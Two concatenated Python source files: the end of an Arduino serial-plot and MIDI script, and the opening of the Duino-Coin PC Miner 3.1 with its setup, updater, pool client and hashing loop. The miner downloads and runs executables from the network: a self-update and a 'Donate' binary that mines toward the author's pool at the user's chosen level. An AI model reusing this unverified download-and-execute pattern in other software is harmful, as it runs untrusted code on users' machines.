ax[0].clear()
ax[1].clear()
# self.weights_radius = np.ones_like(self.radius)/maxDataLength
self.weights_radius = np.ones_like(self.radius)/np.max(self.radius)
self.N_azimuth, self.bins_azimut, self.patches_azimuth = ax[0].hist(self.data[1],bins=range(-4,365-4,9))
self.N_radius, self.bins_radius, self.patches_radius = ax[1].hist(self.radius,bins=np.linspace(20,300,8), weights=self.weights_radius)
ax[1].set_ylim(0,1)
# We'll color code by height, but you could use any scalar
self.fracs = self.N_radius
# we need to normalize the data to 0..1 for the full range of the colormap
self.norm = colors.Normalize(self.fracs.min(), self.fracs.max())
# Now, we'll loop through our objects and set the color of each accordingly
for thisfrac, thispatch in zip(self.fracs, self.patches_radius):
color = plt.cm.gist_yarg(self.norm(thisfrac))
thispatch.set_facecolor(color)
for i in range(0,np.shape(self.fracs)[0]):
if (self.fracs[i] > 0.00001 ):
self.midi_msg = mido.Message('note_on', note=self.notes[i], channel=i)
self.midiOutport.send(self.midi_msg)
print("Note on", self.notes[i])
self.note_status[i] = True
self.midi_msg = mido.Message('note_off', note=self.notes[i], channel=i)
time.sleep(0.5)
self.midiOutport.send(self.midi_msg)
# self.midi_msg = mido.Message('control_change', channel=i, control=0, value=int(self.N_radius[i]*127), time=0)
# self.midi_msg = mido.Message('control_change', channel=i, control=0, value=int(127), time=0)
# self.midiOutport.send(self.midi_msg)
# print('CC channel',i+1,'value',int(self.N_radius[i]*127))
elif (self.fracs[i] < 0.00001 ):
self.midi_msg = mido.Message('note_off', note=self.notes[i], channel=i)
self.midiOutport.send(self.midi_msg)
# print("Note off", self.notes[i])
self.note_status[i] = False
def backgroundThread(self): # retrieve data
time.sleep(1.0) # give some buffer time for retrieving data
self.serialConnection.reset_input_buffer()
while (self.isRun):
self.serialConnection.readinto(self.rawData)
self.isReceiving = True
# print(self.rawData)
def close(self):
self.isRun = False
self.thread.join()
self.serialConnection.close()
print('Disconnected...')
# df = pd.DataFrame(self.csvData)
# df.to_csv('/home/rikisenia/Desktop/data.csv')
def main():
# portName = 'COM10'
portName = 'COM6'
# portName = '/dev/ttyUSB0'
baudRate = 115200
# Arduino sends a stream of data consisting of 1,...,numData information classes,
# each one with a length of dataNumBytes. A stack of maxDataLength data poinsts is stored.
maxDataLength = 100 # number of real time data points
dataNumBytes = 2 # number of bytes of 1 data point
numData = 2 # number of data information classes in 1 datapoint
s = serialPlot(portName, baudRate, maxDataLength, dataNumBytes, numData) # initializes all required variables
s.readSerialStart() # starts background thread
# plotting starts below
pltInterval = 50 # Period at which the plot animation updates [ms]
xmin = 0
xmax = maxDataLength
ymin = 0
ymax = 700
fig = plt.figure(facecolor='k', figsize=(1500,1500))
ax = fig.add_subplot(111, projection='polar')
ax.set_frame_on(False)
ax.tick_params(axis='x', colors='white')
ax.tick_params(axis='y', colors='white')
fig1 = plt.figure(facecolor='w', figsize=(400,800))
ax1 = fig1.add_subplot(211)
ax2 = fig1.add_subplot(212)
anim = animation.FuncAnimation(fig, s.getSerialData, fargs=(ax, fig, 1, maxDataLength), interval=pltInterval) # fargs has to be a tuple
anim1 = animation.FuncAnimation(fig1, s.getSerialData, fargs=((ax1,ax2), fig1, 2, maxDataLength), interval=pltInterval) # fargs has to be a tuple
plt.show()
s.close()
if __name__ == '__main__':
main()
|
PC_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official PC Miner 3.1 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2022
"""
from threading import Semaphore
from time import time, sleep, strptime, ctime
from hashlib import sha1
from socket import socket
from multiprocessing import cpu_count, current_process
from multiprocessing import Process, Manager
from threading import Thread
from datetime import datetime
from random import randint
from os import execl, mkdir, _exit
from subprocess import DEVNULL, Popen, check_call, PIPE
import pip
import sys
import base64 as b64
import os
import json
import zipfile
import requests
from pathlib import Path
from re import sub
from random import choice
from platform import machine as osprocessor
from platform import python_version_tuple
from platform import python_version
from signal import SIGINT, signal
from locale import getdefaultlocale
from configparser import ConfigParser
configparser = ConfigParser()
printlock = Semaphore(value=1)
# Python <3.5 check
f"Your Python version is too old. Duino-Coin Miner requires version 3.6 or above. Update your packages and try again"
def handler(signal_received, frame):
"""
Nicely handle CTRL+C exit
"""
if current_process().name == "MainProcess":
pretty_print(
get_string("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ get_string("goodbye"),
"warning")
if sys.platform == "win32":
_exit(0)
else:
Popen("kill $(ps awux | grep PC_Miner | grep -v grep | awk '{print $2}')", shell=True, stdout=PIPE)
def install(package):
"""
Automatically installs python pip package and restarts the program
"""
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
import cpuinfo
except ModuleNotFoundError:
print("Cpuinfo is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install py-cpuinfo")
install("py-cpuinfo")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
try:
import psutil
except ModuleNotFoundError:
print("Psutil is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install psutil")
install("psutil")
class Settings:
"""
Class containing default miner and server settings
"""
ENCODING = "UTF8"
SEPARATOR = ","
VER = 3.1
DATA_DIR = "Duino-Coin PC Miner " + str(VER)
TRANSLATIONS = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
TRANSLATIONS_FILE = "/Translations.json"
SETTINGS_FILE = "/Settings.cfg"
TEMP_FOLDER = "Temp"
SOC_TIMEOUT = 15
REPORT_TIME = 5*60
DONATE_LVL = 0
try:
# Raspberry Pi latin users can't display this character
"‖".encode(sys.stdout.encoding)
BLOCK = " ‖ "
except:
BLOCK = " | "
PICK = ""
COG = " @"
if (os.name != "nt"
or bool(os.name == "nt"
and os.environ.get("WT_SESSION"))):
# Windows' cmd does not support emojis, shame!
# And some codecs same, for example the Latin-1 encoding don`t support emoji
try:
"⛏ ⚙".encode(sys.stdout.encoding) # if the terminal support emoji
PICK = " ⛏"
COG = " ⚙"
except UnicodeEncodeError: # else
PICK = ""
COG = " @"
def check_updates():
"""
Function that checks if the miner is updated.
Downloads the new version and restarts the miner.
"""
try:
git_json = requests.get("https://api.github.com/repos/revoxhere/duino-coin/releases/latest")
data = json.loads(git_json.text) # Get latest version
zip_file = "Duino-Coin_" + data["tag_name"] + "_linux.zip"
if sys.platform == "win32":
zip_file = "Duino-Coin_" + data["tag_name"] + "_windows.zip"
process = psutil.Process(os.getpid())
running_script = False # If the process is from script
if "python" in process.name():
running_script = True
if float(Settings.VER) < float(data["tag_name"]): # If is outdated
update = input(Style.BRIGHT + get_string("new_version"))
if update == "Y" or update == "y":
pretty_print(get_string("updating"), "warning", "sys")
DATA_DIR = "Duino-Coin PC Miner " + str(data["tag_name"]) # Create new version config folder
if not Path(DATA_DIR).is_dir():
mkdir(DATA_DIR)
try :
configparser.read(str(Settings.DATA_DIR) + '/Settings.cfg') # read the previous config
configparser["PC Miner"] = {
"username": configparser["PC Miner"]["username"],
"mining_key": configparser["PC Miner"]["mining_key"],
"intensity": configparser["PC Miner"]["intensity"],
"threads": configparser["PC Miner"]["threads"],
"start_diff": configparser["PC Miner"]["start_diff"],
"donate": int(configparser["PC Miner"]["donate"]),
"identifier": configparser["PC Miner"]["identifier"],
"algorithm": configparser["PC Miner"]["algorithm"],
"language": configparser["PC Miner"]["language"],
"soc_timeout": int(configparser["PC Miner"]["soc_timeout"]),
"report_sec": int(configparser["PC Miner"]["report_sec"]),
"discord_rp": configparser["PC Miner"]["discord_rp"]
}
with open(str(DATA_DIR) # save it on the new version folder
+ '/Settings.cfg', 'w') as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
except Exception as e:
print(Style.BRIGHT + "There is a error trying to save the config file: " + str(e))
print("The config file isn't saved on the new version folder")
if not os.path.exists(Settings.TEMP_FOLDER): # Make the Temp folder
os.makedirs(Settings.TEMP_FOLDER)
file_path = os.path.join(Settings.TEMP_FOLDER, zip_file)
download_url = "https://github.com/revoxhere/duino-coin/releases/download/" + data["tag_name"] + "/" + zip_file
if running_script:
file_path = os.path.join(".", "PC_Miner_"+data["tag_name"]+".py")
download_url = "https://raw.githubusercontent.com/revoxhere/duino-coin/master/PC_Miner.py"
r = requests.get(download_url, stream=True)
if r.ok:
start = time()
dl = 0
file_size = int(r.headers["Content-Length"]) # Get file size
print("Saving to", os.path.abspath(file_path))
with open(file_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024 * 8): # Download file in chunks
if chunk:
dl += len(chunk)
done = int(50 * dl / file_size)
dl_perc = str(int(100 * dl / file_size))
if running_script:
done = int(12.5 * dl / file_size)
dl_perc = str(int(22.5 * dl / file_size))
sys.stdout.write(
"\r%s [%s%s] %s %s" % (
dl_perc + "%",
'#' * done,
' ' * (50-done),
str(round(os.path.getsize(file_path) / 1024 / 1024, 2)) + " MB ",
str((dl // (time() - start)) // 1024) + " KB/s")) # ProgressBar
sys.stdout.flush()
f.write(chunk)
f.flush()
os.fsync(f.fileno())
print("\nDownload complete!")
if not running_script:
print("Unpacking...")
with zipfile.ZipFile(file_path, 'r') as zip_ref: # Unzip the file
for file in zip_ref.infolist():
if "PC_Miner" in file.filename:
if sys.platform == "win32":
file.filename = "PC_Miner_"+data["tag_name"]+".exe" # Rename the file
else:
file.filename = "PC_Miner_"+data["tag_name"]
zip_ref.extract(file, ".")
print("Unpacking complete!")
os.remove(file_path) # Delete the zip file
os.rmdir(Settings.TEMP_FOLDER) # Delete the temp folder
if sys.platform == "win32":
os.startfile(os.getcwd() + "\\PC_Miner_"+data["tag_name"]+".exe") # Start the miner
else: # os.startfile is only for windows
os.system(os.getcwd() + "/PC_Miner_"+data["tag_name"])
else:
if sys.platform == "win32":
os.system(file_path)
else:
os.system("python3 " + file_path)
sys.exit() # Exit the program
else: # HTTP status code 4XX/5XX
print("Download failed: status code {}\n{}".format(r.status_code, r.text))
else:
print("Update aborted!")
else:
print("The Miner is up to date")
except Exception as e:
print(e)
sys.exit()
class Algorithms:
"""
Class containing algorithms used by the miner
For more info about the implementation refer to the Duino whitepaper:
https://github.com/revoxhere/duino-coin/blob/gh-pages/assets/whitepaper.pdf
"""
def DUCOS1(last_h: str, exp_h: str, diff: int, eff: int):
try:
import libducohasher
fasthash_supported = True
except:
fasthash_supported = False
if fasthash_supported:
time_start = time()
hasher = libducohasher.DUCOHasher(bytes(last_h, encoding='ascii'))
nonce = hasher.DUCOS1(
bytes(bytearray.fromhex(exp_h)), diff, int(eff))
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
else:
time_start = time()
base_hash = sha1(last_h.encode('ascii'))
for nonce in range(100 * diff + 1):
temp_h = base_hash.copy()
temp_h.update(str(nonce).encode('ascii'))
d_res = temp_h.hexdigest()
if eff != 0:
if nonce % 5000 == 0:
sleep(eff / 100)
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
global s
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
def send(msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return sent
def recv(limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool(retry_count=1):
"""
Fetches the best pool from the /getPool API endpoint
"""
while True:
if retry_count > 60:
retry_count = 60
try:
pretty_print(get_string("connection_search"),
"info", "net0")
response = requests.get(
"https://server.duinocoin.com/getPool",
timeout=10).json()
if response["success"] == True:
pretty_print(get_string("connecting_node")
+ response["name"],
"info", "net0")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}")
+ (f", retrying in {retry_count*2}s",
"warning", "net0")
else:
raise Exception("no response - IP ban or connection error")
except Exception as e:
if "Expecting value" in str(e):
pretty_print(get_string("node_picker_unavailable")
+ f"{retry_count*2}s {Style.RESET_ALL}({e})",
"warning", "net0")
else:
pretty_print(get_string("node_picker_error")
+ f"{retry_count*2}s {Style.RESET_ALL}({e})",
"error", "net0")
sleep(retry_count * 2)
retry_count += 1
class Donate:
def load(donation_level):
if donation_level > 0:
if os.name == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url, timeout=15)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
return
elif os.name == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
elif osprocessor() == "x86_64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
else:
pretty_print(
"Donate executable unavailable: "
+ f"{os.name} {osprocessor()}")
return
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url, timeout=15)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
return
def start(donation_level):
if os.name == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*5}')
elif os.name == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*5}')
if donation_level <= 0:
pretty_print(
Fore.YELLOW + get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning', 'sys0')
sleep(5)
if donation_level > 0:
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print(get_string('thanks_donation').replace("\n", "\n\t\t"),
'error', 'sys0')
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000))) + " k"
else:
val = str(round(val)) + " "
return val + symbol
def periodic_report(start_time, end_time, shares,
blocks, hashrate, uptime):
"""
Displays nicely formated uptime stats
"""
seconds = round(end_time - start_time)
pretty_print(get_string("periodic_mining_report")
+ Fore.RESET + Style.NORMAL
+ get_string("report_period")
+ str(seconds) + get_string("report_time")
+ get_string("report_body1")
+ str(shares) + get_string("report_body2")
+ str(round(shares/seconds, 1))
+ get_string("report_body3")
+ get_string("report_body7")
+ str(blocks)
+ get_string("report_body4")
+ str(get_prefix("H/s", hashrate, 2))
+ get_string("report_body5")
+ str(int(hashrate*seconds))
+ get_string("report_body6")
+ get_string("total_mining_time")
+ str(uptime), "success")
def calculate_uptime(start_time):
"""
Returns seconds, minutes or hours passed since timestamp
"""
uptime = time() - start_time
if uptime >= 7200: # 2 hours, plural
return str(uptime // 3600) + get_string('uptime_hours')
elif uptime >= 3600: # 1 hour, not plural
return str(uptime // 3600) + get_string('uptime_hour')
elif uptime >= 120: # 2 minutes, plural
return str(uptime // 60) + get_string('uptime_minutes')
elif uptime >= 60: # 1 minute, not plural
return str(uptime // 60) + get_string('uptime_minute')
else: # less than 1 minute
return str(round(uptime)) + get_string('uptime_seconds')
def pretty_print(msg: str = None,
state: str = "success",
sender: str = "sys0"):
global printlock
"""
Produces nicely formatted CLI output for messages:
HH:MM:S |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("cpu"):
bg_color = Back.YELLOW
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "info":
fg_color = Fore.BLUE
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with printlock:
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT + bg_color + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type,
accept, reject,
total_hashrate,
computetime, diff, ping,
back_color, reject_cause=None):
"""
Produces nicely formatted CLI output for shares:
HH:MM:S |cpuN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
total_hashrate = get_prefix("H/s", total_hashrate, 2)
diff = get_prefix("", int(diff), 0)
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
if reject_cause:
share_str += f"{Style.NORMAL}({reject_cause}) "
fg_color = Fore.RED
with printlock:
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + back_color + Fore.RESET
+ f" cpu{id} " + Back.RESET + fg_color + Settings.PICK
+ share_str + Fore.RESET + f"{accept}/{(accept + reject)}"
+ Fore.YELLOW
+ f" ({(round(accept / (accept + reject) * 100))}%)"
+ Style.NORMAL + Fore.RESET
+ f" ∙ {('%04.1f' % float(computetime))}s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def get_string(string_name):
"""
Gets a string from the language file
"""
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return string_name
def check_mining_key(user_settings):
if user_settings["mining_key"] != "None":
key = b64.b64decode(user_settings["mining_key"]).decode('utf-8')
else:
key = ''
response = requests.get(
"https://server.duinocoin.com/mining_key"
+ "?u=" + user_settings["username"]
+ "&k=" + key,
timeout=10
).json()
if response["success"] and not response["has_key"]: # if the user doesn't have a mining key
user_settings["mining_key"] = "None"
configparser["PC Miner"] = user_settings
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
sleep(1.5)
return
if not response["success"]:
if user_settings["mining_key"] == "None":
pretty_print(
get_string("mining_key_required"),
"warning"
)
mining_key = input("Enter your mining key: ")
user_settings["mining_key"] = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
configparser["PC Miner"] = user_settings
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
sleep(1.5)
check_mining_key(user_settings)
else:
pretty_print(
get_string("invalid_mining_key"),
"error"
)
retry = input("You want to retry? (y/n): ")
if retry == "y" or retry == "Y":
mining_key = input("Enter your mining key: ")
user_settings["mining_key"] = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
configparser["PC Miner"] = user_settings
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
sleep(1.5)
check_mining_key(user_settings)
else:
return
class Miner:
def greeting():
diff_str = get_string("net_diff_short")
if user_settings["start_diff"] == "LOW":
diff_str = get_string("low_diff_short")
elif user_settings["start_diff"] == "MEDIUM":
diff_str = get_string("medium_diff_short")
current_hour = strptime(ctime(time())).tm_hour
greeting = get_string("greeting_back")
if current_hour < 12:
greeting = get_string("greeting_morning")
elif current_hour == 12:
greeting = get_string("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = get_string("greeting_afternoon")
elif current_hour >= 18:
greeting = get_string("greeting_evening")
print("\n" + Style.DIM + Fore.YELLOW + Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string("banner") + Style.RESET_ALL
+ Fore.MAGENTA + " (" + str(Settings.VER) + ") "
+ Fore.RESET + "2019-2022")
print(Style.DIM + Fore.YELLOW + Settings.BLOCK + Style.NORMAL
+ Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET
+ get_string("translation") + Fore.YELLOW
+ get_string("translation_autor"))
try:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x " + str(cpu["brand_raw"]))
except:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x threads")
if os.name == "nt" or os.name == "posix":
print(Style.DIM + Fore.YELLOW
+ Settings.BLOCK + Style.NORMAL + Fore.RESET
+ get_string("donation_level") + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["donate"]))
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("algorithm")
+ Style.BRIGHT + Fore.YELLOW + user_settings["algorithm"]
+ Settings.COG + " " + diff_str)
if user_settings["identifier"] != "None":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("rig_identifier")
+ Style.BRIGHT + Fore.YELLOW + user_settings["identifier"])
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + str(greeting)
+ ", " + Style.BRIGHT + Fore.YELLOW
+ str(user_settings["username"]) + "!\n")
def preload():
"""
Creates needed directories and files for the miner
"""
global lang_file
global lang
if not Path(Settings.DATA_DIR).is_dir():
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE).is_file():
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE,
"wb") as f:
f.write(requests.get(Settings.TRANSLATIONS,
timeout=10).content)
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE, "r",
encoding=Settings.ENCODING) as file:
lang_file = json.load(file)
try:
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("fa"):
lang = "farsi"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("uk"):
lang = "ukrainian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portuguese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("sk"):
lang = "slovak"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
elif locale.startswith("ko"):
lang = "korean"
elif locale.startswith("id"):
lang = "indonesian"
elif locale.startswith("cz"):
lang = "czech"
else:
lang = "english"
else:
try:
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
lang = configparser["PC Miner"]["language"]
except Exception:
lang = "english"
except Exception as e:
print("Error with lang file, falling back to english: " + str(e))
lang = "english"
def load_cfg():
"""
Loads miner settings file or starts the config tool
"""
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
print(get_string("basic_config_tool")
+ Settings.DATA_DIR
+ get_string("edit_config_file_warning")
+ "\n"
+ get_string("dont_have_account")
+ Fore.YELLOW
+ get_string("wallet")
+ Fore.RESET
+ get_string("register_warning"))
username = input(get_string("ask_username") + Style.BRIGHT)
if not username:
username = choice(["revox", "Bilaboz", "JoyBed", "Connor2"])
mining_key = input(Style.RESET_ALL + get_string("ask_mining_key") + Style.BRIGHT)
if not mining_key:
mining_key = "None"
else:
mining_key = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
algorithm = "DUCO-S1"
intensity = sub(r"\D", "",
input(Style.NORMAL +
get_string("ask_intensity") +
Style.BRIGHT))
if not intensity:
intensity = 95
elif float(intensity) > 100:
intensity = 100
elif float(intensity) < 1:
intensity = 1
threads = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_threads")
+ str(cpu_count()) + "): " + Style.BRIGHT))
if not threads:
threads = cpu_count()
if int(threads) > 8:
threads = 8
pretty_print(
Style.BRIGHT
+ get_string("max_threads_notice"))
elif int(threads) < 1:
threads = 1
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - " + get_string("low_diff")
+ "\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - " + get_string("medium_diff")
+ "\n" + Style.BRIGHT
+ "3" + Style.NORMAL + " - " + get_string("net_diff"))
start_diff = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_difficulty")
+ Style.BRIGHT))
if start_diff == "1":
start_diff = "LOW"
elif start_diff == "3":
start_diff = "NET"
else:
start_diff = "MEDIUM"
rig_id = input(Style.NORMAL + get_string("ask_rig_identifier")
+ Style.BRIGHT)
if rig_id.lower() == "y":
rig_id = str(input(Style.NORMAL + get_string("ask_rig_name")
+ Style.BRIGHT))
else:
rig_id = "None"
donation_level = '0'
if os.name == 'nt' or os.name == 'posix':
donation_level = input(Style.NORMAL
+ get_string('ask_donation_level')
+ Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
configparser["PC Miner"] = {
"username": username,
"mining_key": mining_key,
"intensity": intensity,
"threads": threads,
"start_diff": start_diff,
"donate": int(donation_level),
"identifier": rig_id,
"algorithm": algorithm,
"language": lang,
"soc_timeout": Settings.SOC_TIMEOUT,
"report_sec": Settings.REPORT_TIME,
"discord_rp": "y"}
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
return configparser["PC Miner"]
def m_connect(id, pool):
retry_count = 0
while True:
try:
if retry_count > 3:
pool = Client.fetch_pool()
retry_count = 0
socket_connection = Client.connect(pool)
POOL_VER = Client.recv(5)
if id == 0:
Client.send("MOTD")
motd = Client.recv(512).replace("\n", "\n\t\t")
pretty_print("MOTD: " + Fore.RESET + Style.NORMAL
+ str(motd), "success", "net" + str(id))
if float(POOL_VER) <= Settings.VER:
pretty_print(get_string("connected") + Fore.RESET
+ Style.NORMAL +
get_string("connected_server")
+ str(POOL_VER) + ", " + pool[0] + ":"
+ str(pool[1]) + ")", "success",
"net" + str(id))
else:
pretty_print(get_string("outdated_miner")
+ str(Settings.VER) + ") -"
+ get_string("server_is_on_version")
+ str(POOL_VER) + Style.NORMAL
+ Fore.RESET +
get_string("update_warning"),
"warning", "net" + str(id))
sleep(5)
break
except Exception as e:
pretty_print(get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error', 'net0')
retry_count += 1
sleep(10)
def mine(id: int, user_settings: list,
blocks: int, pool: tuple,
accept: int, reject: int,
hashrate: list,
single_miner_id: str):
"""
Main section that executes the functionalities from the sections above.
"""
using_algo = get_string("using_algo")
pretty_print(get_string("mining_thread") + str(id)
+ get_string("mining_thread_starting")
+ Style.NORMAL + Fore.RESET + using_algo + Fore.YELLOW
+ str(user_settings["intensity"])
+ "% " + get_string("efficiency"),
"success", "sys"+str(id))
last_report = time()
r_shares, last_shares = 0, 0
while True:
try:
Miner.m_connect(id, pool)
while True:
try:
while True:
if user_settings["mining_key"] != "None":
key = b64.b64decode(user_settings["mining_key"]).decode('utf-8')
else:
key = user_settings["mining_key"]
job_req = "JOB"
Client.send(job_req
+ Settings.SEPARATOR
+ str(user_settings["username"])
+ Settings.SEPARATOR
+ str(user_settings["start_diff"])
+ Settings.SEPARATOR
+ str(key)
)
job = Client.recv().split(Settings.SEPARATOR)
if len(job) == 3:
break
else:
pretty_print(
"Node message: " + str(job[1]),
"warning")
sleep(3)
while True:
time_start = time()
back_color = Back.YELLOW
eff = 0
eff_setting = int(user_settings["intensity"])
if 99 > eff_setting >= 90:
eff = 0.005
elif 90 > eff_setting >= 70:
eff = 0.1
elif 70 > eff_setting >= 50:
eff = 0.8
elif 50 > eff_setting >= 30:
eff = 1.8
elif 30 > eff_setting >= 1:
eff = 3
result = Algorithms.DUCOS1(
job[0], job[1], int(job[2]), eff)
computetime = time() - time_start
hashrate[id] = result[1]
total_hashrate = sum(hashrate.values())
while True:
Client.send(f"{result[0]}"
+ Settings.SEPARATOR
+ f"{result[1]}"
+ Settings.SEPARATOR
+ "Official PC Miner"
+ f" {Settings.VER}"
+ Settings.SEPARATOR
+ f"{user_settings['identifier']}"
+ Settings.SEPARATOR
+ Settings.SEPARATOR
+ f"{single_miner_id}")
time_start = time()
feedback = Client.recv(
).split(Settings.SEPARATOR)
ping = (time() - time_start) * 1000
if feedback[0] == "GOOD":
accept.value += 1
share_print(id, "accept",
accept.value, reject.value,
total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BLOCK":
